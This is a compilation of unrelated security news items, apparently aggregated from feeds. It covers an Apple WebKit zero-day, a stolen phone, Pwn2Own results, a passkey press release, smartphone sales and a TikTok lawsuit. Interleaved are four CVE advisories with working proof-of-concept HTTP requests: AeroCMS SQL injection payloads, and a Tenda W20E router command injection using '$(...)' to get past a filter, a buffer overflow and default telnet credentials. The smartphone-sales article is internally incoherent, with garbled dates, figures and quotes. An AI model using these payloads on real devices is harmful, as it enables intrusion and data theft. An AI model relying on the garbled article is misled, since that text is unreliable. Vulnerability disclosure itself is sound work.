Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.
Tracked as CVE-2022-42856, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to

Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.

Tracked as **CVE-2022-42856**, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to arbitrary code execution.

The company said it's "aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1."

While details surrounding the exact nature of the attacks are unknown as yet, it's likely that it involved a case of social engineering or a watering hole to infect the devices when visiting a rogue or legitimate-but-compromised domain via the browser.

It's worth noting that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, is required to use the WebKit rendering engine due to restrictions imposed by Apple.

Credited with discovering and reporting the issue is Clément Lecigne of Google's Threat Analysis Group (TAG). Apple noted it addressed the bug with improved state handling.

The update, which is available with iOS 15.7.2, iPadOS 15.7.2, macOS Ventura 13.1, tvOS 16.2, and Safari 16.2, arrives two weeks after Apple patched the same bug in iOS 16.1.2 on November 30, 2022.

The fix marks the resolution of the tenth zero-day vulnerability discovered in Apple software since the start of the year. It's also the ninth actively exploited zero-day flaw in 2022 -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22594** (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32893** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-32894** (Kernel) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32917** (Kernel) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-42827** (Kernel) – An application may be able to execute arbitrary code with kernel privileges

The latest iOS, iPadOS, and macOS updates also introduce a new security feature called Advanced Data Protection for iCloud that expands end-to-end encryption (E2EE) to ‌iCloud‌ Backup, Notes, Photos, and more.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Actively Exploited Zero-Day Vulnerability Discovered in Apple Products

The approve parameter from the AeroCMS-v0.0.1 CMS system is vulnerable to SQL injection attacks.

Permalink

Cannot retrieve contributors at this time

**view\_all\_comments\_update**

The approve parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Comments -> Approve.

**Exploit**

Query out the current user

**Vulnerable Code**

    admin/includes/view_all_comments.php
    

The approve parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    UPDATE comments SET comment_status = 'approved' WHERE comment_id = 3 and extractvalue(0,concat(0x7e,user())) LIMIT 1
    

**POC**

*   Injection Point

    approve=3+and+extractvalue(0,concat(0x7e,user()))
    

*   Request

    GET /AeroCMS-0.0.1/admin/comments.php?approve=3+and+extractvalue(0,concat(0x7e,user())) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/comments.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46051: CVE/view_all_comments_update.MD at master · rdyx0/CVE

AeroCMS v0.0.1 is vulnerable to SQL Injection via the delete parameter.

**categories\_delete\_sql\_injection**

The delete parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Categories-> Delete.

**Exploit**

The first character of the current database is ord('a'), which is chr(97), delay

**Vulnerable Code**

    AeroCMS-0.0.1\admin\categories.php
    

Use the deleteCategories() function

Traced to the 'admin/functions.php' file

The delete parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    DELETE FROM categories WHERE cat_id = 3 RLIKE (SELECT 5646 FROM (SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))=97,3,0)))))XOyv) LIMIT 1
    

**POC**

*   Injection Point

    delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv)
    

*   Request

    GET /AeroCMS-0.0.1/admin/categories.php?delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/categories.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46047: CVE/categories_delete_sql_injection.md at master · rdyx0/CVE

Categories: News
Tags: London

Tags:  Shenzen

Tags:  UK

Tags:  China

Tags:  phone

Tags:  stolen

Tags:  theft

Tags:  thief

Tags:  iPhone

Tags:  Apple

Tags:  Find My

Ever wondered what happens to your phone when it gets stolen? The answer may surprise you. We're in it for the long haul...



(Read more...)




The post Man watches as stolen phone travels from UK to China appeared first on Malwarebytes Labs.

Have you ever wondered what happens to your phone if it’s stolen while on vacation or a business trip? The answer may surprise you, as it did one Mastodon user who graciously shared a tale of a smartphone gaining some serious air miles. Our intrepid business traveller was in London when their phone was snatched from their hand in the street.

Thankfully, they'd taken the precaution of setting up Apple's Find My service prior to making their trip.

In practical terms, this meant that the phone could be remotely wiped (via Find My) and essentially turned into a paperweight. This has a two fold advantage: Keeping valuable data out of the thief's hands, and also making the phone considerably less useful to a criminal.

You might think a theft such as this stays local, and that's what it looked like for a while with the phone coming to a halt a few miles away. I would have assumed the phone would be sold locally or scrapped, but in this story our thief had other ideas in mind. What followed was an attempt to revive the phone via phishing, and a very long flight.

**When a theft gets phishy**

The thief was not just interested in grabbing the device and selling it on in its bricked form. They wanted to reactivate the device too. This was attempted via a text message sent to the phone owner’s emergency contacts. The text reads as follows:

> _Your iPhone 13 Pro 256GB Sierra Blue has been found. View location: \[URL\]_
> 
> _Apple Support_

The site, which spoofed the Find My website, was phishing for an Apple ID login to kickstart the reviving process. I’m sure the thief wouldn’t have objected to whatever data was locked behind that Apple ID too, but we can presume that getting the phone up and running is the primary concern.

Roughly a month after the phone was stolen, the activation lock for the device started pinging home. This is the feature which prevents random people from unlocking a lost or stolen device.

The victim of this crime was surprised to learn that the stolen device had travelled from the UK to Shenzen in China. You may wonder if the Find My service was perhaps malfunctioning and the stolen device was still in London somewhere, but as we're about to see, this is far from the only example of this happening.

**Why do stolen phones end up in China?**

Stolen phones ending up in China is, perhaps surprisingly, not uncommon. In fact, searching for this kind of thing brings up a wealth of results (try it!) and they all tend to look something like this:

> My phone was swiped from my hand in London a month ago. Annoyed, I immediately blocked the phone and erased its contents.
> 
> Anyway, I got a notification today and that my phone has now been switched on in Shenzen, China. pic.twitter.com/nPNEGaflQT
> 
> — Scott Bryan (@scottygb) October 25, 2021

Phones make their way via “networks of black marketers” to their new owners in cities where phones, and modifications, are extremely cheap. In many cases, the final destination for the stolen iPhone is someone who has no idea a theft took place. Occasionally there’s a heartwarming story and meet up, but mostly it’s just a case of “My phone is gone and now I need to do something about it”.

**What to do if your iPhone is stolen**

There are some great tips gleaned from personal experience via the above tale, most importantly making sure you turn on Find My. This is the way you’ll be able to remotely scrub that device and make it unusable for the thief. The other great tip is to make sure you have a secondary (and fast!) way to access Find My. If you don’t have an additional device with you, then you may struggle to find a way to get online and remedy the situation. Every second counts. It’s worth noting that you can still take steps to protect your data even if you don’t enable Find My.

Apple provides several tips for what you should do in the event of a theft. Here’s some of the more pressing technical related suggestions:

1.  **Lock your phone down**. Use the previously mentioned Find My service. Do this in advance of any theft! In your Settings app, tap your name, and then select Find My.
    

     **2. Mark your phone as lost**. Doing this via the Find My app disables the Apple Pay service, and locks the device with a passcode like so:

*   Open the Find My app and choose the Devices tab or the Items tab.
*   Select your missing device or item.
*   Scroll down to Mark As Lost or Lost Mode and select Activate or Enable.
*   Follow the onscreen steps if you want your contact information to be displayed on your missing device or item, or if you want to enter a custom message asking the finder of your missing device to contact you.
*   Select Activate.

**Erase the device remotely**. To do this:

*   Open the Find My app and choose the Devices tab.
*   Select the device you want to erase remotely.
*   Scroll down and choose Erase This Device.
*   Select Erase This \[device\].

**What to do if your Android is stolen**

This can be a bit trickier, as there are so many different models out there and often network carriers nudge you towards using their own bespoke tracking solutions. Despite this, the basic Android options should always be available. To enable Android's find my device service:

*   Open Settings
*   Tap Security > Find My Device.
*   If you can't see the Security option, tap Security > location or Google > Security.
*   Ensure Find My Device is enabled.
*   Test the service out on the Find my Device site.
*   From the map, you can select the "Lock and Erase" option. Note that it may not erase the contents of an SD card.

Losing your phone, laptop, or other device to a thief is never a pleasant experience but you’re never totally out of options. The trick is to ensure you put some time into setting these solutions in place long before the possibility of a theft happens. Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Man watches as stolen phone travels from UK to China

By Habiba Rashid
The Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023.
This is a post from HackRead.com Read the original post: Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

Previously **we reported** on the results from Pwn2Own Toronto for Day 1 and Day 2 and today we will be talking about the proceedings of the last two days of the contest. Without further ado, let’s get right into it.

**Pwn2Own Day 3**

On December 08, 2022, the first success of the day went to Team Viettel which earned $20,000 for their execution of an OS Command Injection attack against the WD My Cloud PRO SERIES PR4 100 in the NAS category. 

A newcomer Chi Tran of team Bun Bo Ong Chi executed their stack-based buffer overflow attack against the Canon image CLASS MF74Cdw in the Printer category and was rewarded $10,000 for their hack.

Team DEVCORE on the other hand, used one unique and one previously used bug against the Sonos One Speaker in the Smart Speaker category, earning $22,500. 

NCC Group’s representative team earned $50,000 for hacking a Ubiquiti router and a Lexmark printer in the SOHO Smashup category. The Star Labs team earned $25,000 for an attack targeting a Synology router and a Canon printer. Team Viettel was awarded $37,500 for a hack involving a Cisco router and a Canon printer.

For only the Samsung Galaxy S22 exploits throughout the event, the contestants earned a total of $125,000. Google and Apple phones were not targeted. 

By the end of the third day of the competition, a total of $934,750 had been awarded to the contestants for their successful hacks.

**Watch as Hackers Hack at Pwn2Own**

**Pwn2Own Day 4**

On December 09, 2022, on the fourth day, ZDI, the organization behind Pwn2Own, awarded another $55,000, bringing the total contest prize money to $989,750. 63 unique zero days were purchased during the four-day contest. 

The Master of Pwn title was awarded to the DEVCORE team for their winnings of $142,500 and 18.5 points. Team Viettel and NCC Group followed close behind with 16.5 and 15.5 points respectively. 

Out of the 11 attempts scheduled for the last day of the contest, targeting printers and routers, only 3 were successful since the others either failed or used bugs previously reported in the event. 

The first victory went to Chris Anastasion who used a heap-based buffer overflow to exploit the Lexmark printer, earning $10,000. This was followed by ANHTUD Information Security Department earning $10,000 by using another heap-based overflow to exploit the Canon printer. 

The last successful hack of the Pwn2Own Toronto contest was carried out by the namnp team which won $10,000 for their unique bug against the Canon printer.

**Watch as Hackers Hack at Pwn2Own**

With this, the hacking competition came to an end, marking yet another successful Pwn2Own iteration. However, the Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023. It will be an ICS/SCADA-themed event.

1.  **Google Launches Bug Bounty Prog for Open-Source Software**
2.  **Multichain hack: Hacker returns $1m, keeps $150k as bug bounty**
3.  **Xiaomi, Amazon Echo, & Samsung Smart TVs pwned at Pwn2Own**
4.  **Hack the US Army for good with ‘Hack The Army’ bug bounty prog**
5.  **Pwn2Own: Microsoft Exchange server, Teams, Zoom, Chrome pwned**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

Shopify Plus stores can now easily implement passwordless login with Passkeys support to help reduce drop rate and increase conversion using the free OwnID plug-in.

**NEW YORK****,** **Dec. 12, 2022** **/PRNewswire/ --** OwnID, the passwordless infrastructure for the internet, announced today the release of Passkeys support for all Shopify Plus stores. The new plugin is a low-code way to add passwordless authentication to your store. By eliminating the need to create and remember passwords, it allows users to register and log in with a single click on any device. OwnID offers the technology at no cost, up to 10,000 logins per month. The news comes following OwnID's release of a no-code WordPress plugin.

With Passkeys support, Shopify Plus site owners can eliminate the dependency on passwords, improve the conversion rate by 20% or more, and reduce user drop-offs by 35%. This is based on actual case studies showing improved metrics following the deployment of the OwnID solution. Streamlining the purchase flow and reducing the user drop-off rate are crucial for store owners and marketers. Both can be achieved by eliminating passwords.

Shopify Plus store owners who wish to add passwordless support to their website, will simply follow 4 easy steps to enable multipass login in their store, and connect the Shopify plugin to the OwnID console using a API key. The implementation process was designed to be as simple and easy as possible.

Earlier this year, Apple, Google and Microsoft joined hands with the FIDO Alliance and the World Wide Web Consortium to work on removing passwords for user authentication across the platforms. Apple announced its own implementation of this standard called Passkey. Microsoft and Google released similar statements announcing their own Passkeys implementation.

OwnID is a revolutionary authentication solution that offers a frictionless, faster, and cheaper way to verify a user's identity. It delivers a secure, seamless, and personalized experience for the user. The OwnID solution is a complete end-to-end platform that can be utilized by any application or website to significantly reduce the drop-off rate, improve user experience, and protect users from fraud. It supports Passkeys out of the box. This means that the OwnID solution works for all users, regardless of device type – Apple, Samsung, Google, Microsoft, or any other.

Named as "Best Passwordless technology" by the 2022 CISO Choice Awards, OwnID has helped many top brands adopt a passwordless solution, including Carrefour, Delonghi, Nestle, Carnival Cruise Line and more.

To get started visit ownid.com. 

For more information about Passkeys visit passkeys.com.

**About OwnID**

Helping businesses connect better with their customers online. Dor Shany and Rooly Eliezerov founded OwnID believing that if a business identifies a customer, it will better understand that customer's needs and serve them better. Exceptional service and personalized experiences pave the way for long-term relationships between your business and your customers. But traditional registration and login are cumbersome and get in the way of these relationships. OwnID is here to offer a more friendly and secure authentication experience that keeps you connected to your customers.

Learn more on OwnID.com.

Shopify Plus Stores Can Easily Add Passwordless Login With Passkeys Support

By Owais Sultan
In the US, there was a drop in sales of 19% as people stayed on their phones for longer. Globally, smartphone sales are down from 488 million units to 429 million units.
This is a post from HackRead.com Read the original post: Smartphone Discounts Set To Rocket As Market Slumps

In the last quarter, the smartphone market has sunk by 12 percent. This has led to a dramatic decrease in the number of people updating their phones and is predicted to have serious knock-on effects for manufacturers and carriers.

The industry is about to enter a **period of price wars** and discounts, as manufacturers compete for consumers in an effort to shift unsold inventories.

(Image Source: Statista)

The pandemic caused a multitude of issues for the smartphone market. Chips that power handsets were scares between as manufacturers temporarily closed to help stop the spread of the virus. This not only caused a **shortage in smartphone handsets** but also, in cars and other electronic goods like laptops. 

New data from Current Analysis suggests that the dramatic drop in smartphone sales is due to a lack of innovation and an increasing reliance on feature phones by carriers. Sales of all mobile phones dropped by 15% across the world, in comparison to a rise of 3% for tablets and 1% for PCs.

In the US, there was a drop in sales of 19% as people stayed on their phones for longer. Globally, smartphone sales are down from 488 million units to 429 million units.

This is bad news for all of the smartphone manufacturers who have been hoping for a fruitful Christmas season to see their sales and plans to increase market share. While last year saw record sales and a boom in smartphone usage, this can be attributed to the fact that the majority of us had just bought a new phone, and the novelty had worn off by now.

What’s even more troubling is that this dip in smartphone sales is not expected to rise until 2030. The smartphone market is, in fact, expected to increase by a mere 1.6% from this time on.

“The smartphone industry has reached saturation in most markets and carriers are introducing new services and device price points aimed at maintaining their market share,” said David Hsieh, an analyst for Current Analysis. “Smartphones are also becoming less essential in some markets as 2015 signs of progress and a growing focus shifts to the premium smartphone class.

China will be more likely to experience a “**halo effect**” than other markets across Asia as this is where all new smartphones are sold and increased smartphone penetration contributes to wider adoption. 

Curiously, the smartphone market is expected to reach saturation in India at around the same time as most other markets so there will be no sudden shift in growth. In fact, India’s smartphone penetration rate is much lower than other markets due to its low usage of high-end smartphones costing thousands of dollars and having many limitations in terms of data services and devices available.

(Image Source: GSM Arena News)

“The slowdown in smartphone growth is largely coming from Huawei and Apple, who have dramatically slowed their market share growth as they launch new products or refresh existing ones.”

Samsung has done particularly well this year, even though it has had its fair share of hiccups; but all hope for the Korean company’s increasing market share will be crushed if it does not launch its all-new **Galaxy range** in 2023, especially as Apple has overtaken them in market share in China. 

However, these issues are set to be resolved in the next two years meaning a sudden boost in demand and an increase in market share. China’s growth is expected to increase by over three percentage points from last year, from 97% to just under 100%. Conversely, Russia’s figure will plummet from 93% to around 89%.

The future for **Android and iOS** is looking rather glum at the moment as there seems to be no innovation or changes in their systems. Carriers and manufacturers are also putting their foot down on the pricing of new phones, which is causing some consumers to be put off by the higher costs of upgrading.

There is also the threat of Elon Musk **potentially developing** his own smartphone if Apple bans the Twitter app, which will be of concern to the other tech giants, increasing competition whilst also the threat of new technology. 

1.  **Top 10 Android Educational Apps That Collect Most User Data**
2.  **Ways That VoIP Tech Impacts Marketplaces and How to Adapt**
3.  **Global cybersecurity market poised to reach $420 billion by 2028**
4.  **Android apps ask for dangerous permissions. Is yours among them?**

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Smartphone Discounts Set To Rocket As Market Slumps

Tenda W20E V16.01.0.6(3392) is vulnerable to Command injection via cmd_get_ping_output.

**Tenda W20E Command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is a Command injection vulnerability in tenda W20E V16.01.0.6(3392), which can execute arbitrary command in route system.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function do\_ping\_action:

The program passes the contents obtained by the hostName parameter to hostname.  
There is some filtering of parameters is judged by if, but we can bypass it, which is explained in the next section.  
Then, copy the content of hostname through the strncpy function into cfg.hostname.  
And cfg is called by function cmd\_get\_ping\_output().  
In function cmd\_get\_ping\_output：

Then, format the matching content of cfg.hostname through the snprintf function into new\_cmd\_buf.  
The new\_cmd\_buf is called by popen().  
There is a command injection vulnerability.  
The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack. In the judgment of If, you can see that the characters(; | &) are filtered, and if these characters are included, code will goto fail. But we can use '$' to do Command injection.  
 The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668695093889 HTTP/1.1
Host: 192.168.0.1
Content-Length: 87
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=70ebc4f9c9d22827a5874d1bb6f06abddwdvmy; bLanguage=cn; sessionid=W20Ev5:0.167.3:6b0846
Connection: close

{"setFixTools":{"networkTool":1,"hostName":"test$(touch /tmp/test0)","packageSize":32}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

Figure shows POC attack effect, the file test0 is created.

**CVE-ID**

unsigned

CVE-2022-45996: public_bug/tenda/w20e/2 at main · bugfinder0/public_bug

Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow.

**Tenda W20E Buffer overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is an buffer overflow vulnerability in tenda W20E V16.01.0.6(3392), which can cause httpd to crash and restart.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function formSetPortMirror, the corresponding function field is setPortMirror.

In function formSetPortMirror:

The program passes the contents obtained by the portMirrorMirroredPorts parameter to pMirroredPorts.  
Then, format the matching content of pMirroredPorts through the sprintf function into sMibValue.  
There is no size check, so there is a vulnerability that can cause buffer overflow through portMirrorMirroredPorts field.

The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack.

The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668753675738 HTTP/1.1
Host: 192.168.0.1
Content-Length: 95
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: curShow=; bLanguage=cn; sessionid=W20Ev5:0.133.2:f012ed
Connection: close

{"setPortMirror":{"portMirrorEn":true,"portMirrorLanPort":4,"portMirrorMirroredPorts":"1,0,0a\*200"}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

And attack twice:

Figure shows POC attack effect, the binary httpd restarts, because the process id changed.

**CVE-ID**

unsigned

CVE-2022-45997: public_bug/tenda/w20e/1 at main · bugfinder0/public_bug

Categories: News
Tags: TikTok

Tags:  ban TikTok

Tags:  states that banned TikTok

Tags:  Indiana bans TikTok

Tags:  Maryland bans TikTok

Tags:  Shou Zi Chew

Tags:  Brendan Carr

Tags:  ByteDance

Tags:  Brooke Oberwetter

The State of Indiana has filed two lawsuits against TikTok, Inc, the company behind the same name app, and its parent company, ByteDance.



(Read more...)




The post Indiana sues TikTok, describes it as "Chinese Trojan Horse" appeared first on Malwarebytes Labs.

Posted: December 12, 2022 by

On Wednesday, the State of Indiana filed two lawsuits against TikTok, Inc, the company behind the same name app, and its parent company, ByteDance.

The first suit alleges TikTok's 12+ rating on the Apple App Store and a "T" for "Teen" rating in the Google Play Store and the Microsoft Store are misleading as minors are repeatedly exposed to inappropriate content generated by the app's algorithm. 

The second suit claims that TikTok violated consumer protection laws by not disclosing that China has access to sensitive user data.

"TikTok is a wolf in sheep's clothing," court documents read, echoing what Federal Communications Commission (FCC) Chairman Brendan Carr said about TikTok back in July.

"As long as TikTok is permitted to deceive and mislead Indiana consumers about the risks to their data, those consumers and their privacy are easy prey."

TikTok declined to comment on the lawsuits; however, its spokesperson, Brooke Oberwetter, was quoted by The New York Times saying, "the safety, privacy, and security of our community is our top priority." Oberwetter added:

> “We build youth well-being into our policies, limit features by age, empower parents with tools and resources, and continue to invest in new ways to enjoy content based on age-appropriateness or family comfort."

When TikTok CEO Shou Zi Chew attempted to assuage critics by pointing out that US data are hosted on servers managed and controlled by Oracle, an American company, and disputing claims that the Chinese government could access the data, the second suit stated that such statements are "false and misleading."

"In addition to TikTok's statements that some China-based employees may access unencrypted US user data, which includes Indiana consumers' data, TikTok's privacy policy permits TikTok to share information with ByteDance' or 'other affiliate of our corporate group,''" the suit claims. "ByteDance and any affiliates and their employees who are located in China or are Chinese citizens are subject to Chinese law and the oppressive Chinese regime, including but not limited to laws requiring cooperation with national intelligence institutions and cybersecurity regulators."

> Because ByteDance is subject to Chinese law, and TikTok’s privacy policy expressly permits TikTok to share data with ByteDance, TikTok’s statements that Chinese law does not apply to that data are false and misleading.

Banning TikTok is slowly becoming a trend among US states. On Tuesday, Outgoing Maryland Governor Larry Hogan issued a directive forbidding state employees from using several Chinese and Russian equipment and software, citing these present "an unacceptable level of security risk." These include TikTok, Huawei products, ZTE, Tencent products, Alibaba products, and Kaspersky.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Tag

#apple